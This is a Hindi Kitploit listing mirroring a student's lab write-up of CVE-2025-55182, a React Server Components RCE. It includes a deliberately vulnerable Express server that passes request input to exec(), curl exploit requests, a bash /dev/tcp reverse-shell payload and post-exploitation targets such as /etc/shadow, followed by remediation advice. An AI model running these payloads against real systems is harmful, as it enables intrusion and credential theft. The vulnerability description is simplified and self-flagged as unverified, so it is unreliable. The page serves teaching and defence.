Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182-analysis — CVE-2025-55182 (React) की सुरक्षा अनुसंधान और शोषण विश्लेषण — CVSS + OWASP Top 10 मैपिंग | Kitploit
उपकरण/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

CVE-2025-55182 (React) की सुरक्षा अनुसंधान और शोषण विश्लेषण — CVSS + OWASP Top 10 मैपिंग

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
4 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 — React सर्वर घटकों का RCE विश्लेषण

वेब एप्लिकेशन भेद्यता विश्लेषण · M2 Cybersecurity · 2025 लेखक: Niane Mohamed · LinkedIn

React सर्वर घटकों में एक क्रिटिकल (CVSS 10.0) असुरक्षित विसीरियलाइज़ेशन भेद्यता का अंत-से-अंत शोषण श्रृंखला, टोही से लेकर अप्रमाणित रिमोट कोड निष्पादन तक, पूर्ण उपचार मार्गदर्शिका के साथ।


⚠️ नैतिक अस्वीकरण

यह शोध एक जानबूझकर कमजोर लैब एप्लिकेशन को लक्षित करता है जो CVE को प्रदर्शित करने के लिए बनाया गया है। सभी परीक्षण एक पृथक आभासी नेटवर्क में हुए जिसका उत्पादन प्रणालियों, वास्तविक उपयोगकर्ता डेटा या तृतीय-पक्ष सेवाओं से कोई संबंध नहीं था।

  • न करें इन तकनीकों को उन प्रणालियों के विरुद्ध चलाएँ जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है।
  • न करें कमजोर एप्लिकेशन को किसी भी इंटरनेट-सुलभ नेटवर्क पर तैनात करें।
  • जिम्मेदार प्रकटीकरण सिद्धांत लागू होते हैं — हमेशा समन्वित चैनलों के माध्यम से निष्कर्षों की रिपोर्ट करें।

विषय सूची

  1. भेद्यता सारांश
  2. प्रभावित संस्करण
  3. लैब वातावरण
  4. शोषण वॉकथ्रू
  5. प्रभाव आकलन
  6. उपचार
  7. प्रदर्शित कौशल

भेद्यता सारांश

भेद्यता कैसे काम करती है

React Server Components ने सर्वर-रेंडर किए गए घटकों को क्लाइंट तक स्ट्रीम करने के लिए एक नया सीरियलाइज़ेशन प्रारूप पेश किया। कमजोर संस्करणों में, RSC एंडपॉइंट एक JSON पेलोड स्वीकार करता है जिसमें एक cmd फ़ील्ड होती है जो सर्वर-साइड रेंडरिंग मूल्यांकन के भाग के रूप में child_process.exec() को असुरक्षित रूप से पारित की जाती है।

एक हमलावर एक निर्मित POST अनुरोध भेज सकता है जो:

  1. एक वैध RSC पेलोड के रूप में स्वीकार किया जाता है (कोई प्रमाणीकरण नहीं, कोई CSRF नहीं)
  2. "रेंडर" के दौरान सर्वर-साइड कोड निष्पादन को ट्रिगर करता है
  3. Node.js प्रक्रिया के विशेषाधिकारों के साथ चलता है (अक्सर कंटेनरों में root)

प्रभावित संस्करण

घटककमजोर श्रेणीपैच किया गया संस्करण
react19.0.0 → 19.2.019.3.0+

लैब वातावरण

लक्ष्य एप्लिकेशन

एक न्यूनतम Express + RSC सर्वर जो एक /rsc एंडपॉइंट को उजागर करता है जो आने वाले पेलोड से कमांड को असुरक्षित रूप से निष्पादित करता है — वास्तविक CVE के भेद्यता पैटर्न को नियंत्रित तरीके से पुन: उत्पन्न करना:

root@kitploit:~
// server.js — सरलीकृत, केवल लैब के लिए
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // कमजोर: हमलावर-नियंत्रित स्ट्रिंग निष्पादित करता है
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

शोषण वॉकथ्रू

चरण 1 — टोही

root@kitploit:~
# पोर्ट खोज
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# सेवा सत्यापन
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

X-Powered-By: Express हेडर और असामान्य पोर्ट 3000 यह मजबूत संकेत प्रदान करते हैं कि यह एक Node.js एप्लिकेशन है — RSC तैनातियों के अनुरूप।

चरण 2 — हानिरहित कमांड के माध्यम से पुष्टि

कुछ भी विनाशकारी करने से पहले, एक हानिरहित कमांड के साथ भेद्यता को मान्य करें:

root@kitploit:~
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# प्रतिक्रिया:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ पुष्टि हुई: root के रूप में अप्रमाणित RCE। सर्वर बिना किसी बाधा के विशेषाधिकारों के साथ चलता है।

चरण 3 — रिवर्स शेल

एकल-कमांड निष्पादन से पूर्ण इंटरैक्टिव शेल में अपग्रेड करें:

root@kitploit:~
# हमलावर मशीन पर लिसनर
nc -lvnp 4444

# पेलोड वितरण
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

लिसनर प्राप्त करता है:

root@kitploit:~
connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

चरण 4 — पोस्ट-एक्सप्लॉइटेशन क्षमता (प्रदर्शित, निष्पादित नहीं)

लक्ष्य पर root के साथ, एक हमलावर आसानी से यह कर सकता है:

  • /etc/shadow, SSH कुंजियाँ, एप्लिकेशन रहस्य, .env फ़ाइलें पढ़ सकता है
  • स्थिरता स्थापित कर सकता है (cron जॉब्स, systemd सेवाएँ, SSH कुंजी प्रत्यारोपण)
  • खोजे गए क्रेडेंशियल्स के माध्यम से पार्श्व रूप से आगे बढ़ सकता है
  • क्रिप्टोमाइनर या रैनसमवेयर तैनात कर सकता है
  • उपयोगकर्ता डेटा को चुपचाप कैप्चर करने के लिए Node.js एप्लिकेशन को संशोधित कर सकता है

प्रभाव आकलन

व्यावसायिक प्रभाव (काल्पनिक लक्ष्य परिदृश्य)

खतरा अभिनेता प्रोफ़ाइल

इस हमले की कम जटिलता — कोई प्रमाणीकरण नहीं, कोई उपयोगकर्ता सहभागिता नहीं, एकल HTTP अनुरोध — इसे इसके लिए आकर्षक बनाती है:

  • अवसरवादी स्कैनर (CVE के लिए ऑटो-स्कैन करने वाले बॉटनेट)
  • प्रारंभिक पहुँच दलाल जो रैनसमवेयर समूहों को फुटहोल्ड बेचते हैं
  • राष्ट्र-राज्य अभिनेता जो React सर्वर-रेंडरिंग का उपयोग करने वाले संगठनों को लक्षित करते हैं

उपचार

तत्काल (24 घंटे के भीतर)

  1. React को 19.3.0+ में अपग्रेड करें — पैच किया गया संस्करण

    root@kitploit:~
    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. अस्थायी WAF नियम (यदि अपग्रेड में देरी हो):

    root@kitploit:~
    JSON बॉडी में "cmd" फ़ील्ड वाले /rsc पर POST अनुरोधों को ब्लॉक करें
    
  3. आपातकालीन घटना प्रतिक्रिया:

    • पिछले 90 दिनों के सर्वर एक्सेस लॉग की समीक्षा करें
    • असामान्य /rsc POST ट्रैफ़िक देखें
    • सर्वर से सुलभ सभी रहस्यों को घुमाएँ
    • उपचार से पहले फोरेंसिक के लिए प्रभावित सिस्टम का स्नैपशॉट लें

अल्पकालिक (2 सप्ताह के भीतर)

दीर्घकालिक (1 तिमाही के भीतर)

OWASP शीर्ष 10 मैपिंग

OWASP श्रेणीप्रासंगिकता
A03:2021 — इंजेक्शन

प्रदर्शित कौशल

  • भेद्यता विश्लेषण: CVE ट्राइएज, CVSS स्कोरिंग, शोषण क्षमता आकलन
  • टोही: Nmap स्कैनिंग, सेवा फ़िंगरप्रिंटिंग, बैनर ग्रैबिंग
  • शोषण: curl के साथ HTTP हेरफेर, रिवर्स शेल इंजीनियरिंग, पेलोड निर्माण
  • प्रॉक्सी टूलिंग: OWASP ZAP इंटरसेप्शन, अनुरोध/प्रतिक्रिया संशोधन
  • व्यावसायिक संचार: तकनीकी निष्कर्षों का कार्यकारी जोखिम भाषा में अनुवाद
  • उपचार डिज़ाइन: तत्काल/अल्प/दीर्घकालिक क्षितिज पर स्तरित नियंत्रण
  • ढाँचे: OWASP शीर्ष 10, CVSS v3.1, CWE वर्गीकरण, GDPR/DSGVO प्रभाव आकलन

संदर्भ

  • CVE-2025-55182 — NVD प्रविष्टि (प्लेसहोल्डर — उद्धरण से पहले सत्यापित करें)
  • React Server Components दस्तावेज़ीकरण
  • OWASP शीर्ष 10 — 2021
  • CVSS v3.1 विनिर्देश
  • CWE-502 — अविश्वसनीय डेटा का विसीरियलाइज़ेशन

लाइसेंस

MIT लाइसेंस — LICENSE देखें

शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए प्रकाशित। शीर्ष पर नैतिक अस्वीकरण देखें।


संपर्क

Niane Mohamed — नेटवर्क और सुरक्षा अभियंता 📍 नौकचोट, मॉरिटानिया → जर्मनी 🇩🇪 में अवसरों की तलाश 📧 [email protected] · 🔗 LinkedIn

टूल डाउनलोड करें
क्षेत्रमान
CVECVE-2025-55182
वर्गअसुरक्षित विसीरियलाइज़ेशन → रिमोट कोड निष्पादन
CVSS v3.110.0 (क्रिटिकल) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
प्रमाणीकरण आवश्यककोई नहीं
उपयोगकर्ता सहभागिता आवश्यककोई नहीं
हमला वेक्टरनेटवर्क (रिमोट)
घटकReact सर्वर घटक (RSC) रनटाइम
react-server-dom-webpack19.0.0 → 19.2.019.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+
भूमिकाOSउपकरण
हमलावरKali Linux (नवीनतम)nmap, curl, netcat, OWASP ZAP, Firefox
लक्ष्यUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
नेटवर्कVMware VMnet Host-Onlyकोई इंटरनेट आउटगोइंग नहीं
अक्षप्रभावस्पष्टीकरण
गोपनीयताक्रिटिकलसभी सर्वर डेटा तक पूर्ण पढ़ने की पहुँच
अखंडताक्रिटिकलएप्लिकेशन कोड और उपयोगकर्ता डेटा को संशोधित करने की क्षमता
उपलब्धताउच्चहमलावर सेवा को समाप्त कर सकता है या फिरौती के लिए रोक सकता है
नियामकगंभीरGDPR/DSGVO उल्लंघन जिसमें अनिवार्य 72 घंटे का प्रकटीकरण · 4% वैश्विक राजस्व जुर्माना संभावित
प्रतिष्ठागंभीरसार्वजनिक CVE-मैप किया गया उल्लंघन ग्राहक विश्वास को नुकसान पहुँचाता है
वित्तीयउच्चघटना प्रतिक्रिया, नियामक जुर्माना, संभावित सामूहिक मुकदमा
नियंत्रणउद्देश्य
यदि RSC उपयोग में नहीं है तो इसे अक्षम करेंहमले की सतह कम करें — कई ऐप्स को सर्वर घटकों की आवश्यकता नहीं होती
सख्त इनपुट सत्यापननिष्पादन योग्य कुंजियों वाली किसी भी विसीरियलाइज़्ड वस्तु को अस्वीकार करें
गैर-रूट कंटेनर उपयोगकर्तायदि RCE दोबारा होता है तो विस्फोट त्रिज्या सीमित करें
केवल-पढ़ने के लिए रूट फाइलसिस्टमस्थिरता और बाइनरी ड्रॉप को रोकें
ईग्रेस फ़िल्टरिंगऐप सर्वर से मनमाने IPs तक आउटबाउंड ट्रैफ़िक को ब्लॉक करें
नियंत्रणउद्देश्य
व्यवहार विश्लेषण के साथ WAFहस्ताक्षर नियमों से परे असामान्य POST पेलोड का पता लगाएं
रनटाइम एप्लिकेशन सेल्फ-प्रोटेक्शन (RASP)रनटाइम पर exec() जैसे खतरनाक फ़ंक्शन कॉल को ब्लॉक करें
CI/CD में SCAतैनाती से पहले कमजोर निर्भरताओं को पकड़ें (pip-audit, npm audit, Trivy)
पेनेट्रेशन टेस्टिंग कैडेंसवार्षिक + प्रमुख रिलीज़ के बाद
बग बाउंटी प्रोग्रामहमलावरों द्वारा समस्याओं को खोजने से पहले व्हाइट-हैट प्रकटीकरण को प्रोत्साहित करें
विसीरियलाइज़्ड इनपुट के माध्यम से कमांड इंजेक्शन
A08:2021 — सॉफ्टवेयर और डेटा अखंडता विफलताएँअखंडता सत्यापन के बिना असुरक्षित विसीरियलाइज़ेशन
A06:2021 — कमजोर और पुराने घटकप्रकटीकरण के बाद React 19.0-19.2 का उपयोग करना
A05:2021 — सुरक्षा गलत विन्यासNode.js को root के रूप में चलाना, कोई इनपुट सत्यापन नहीं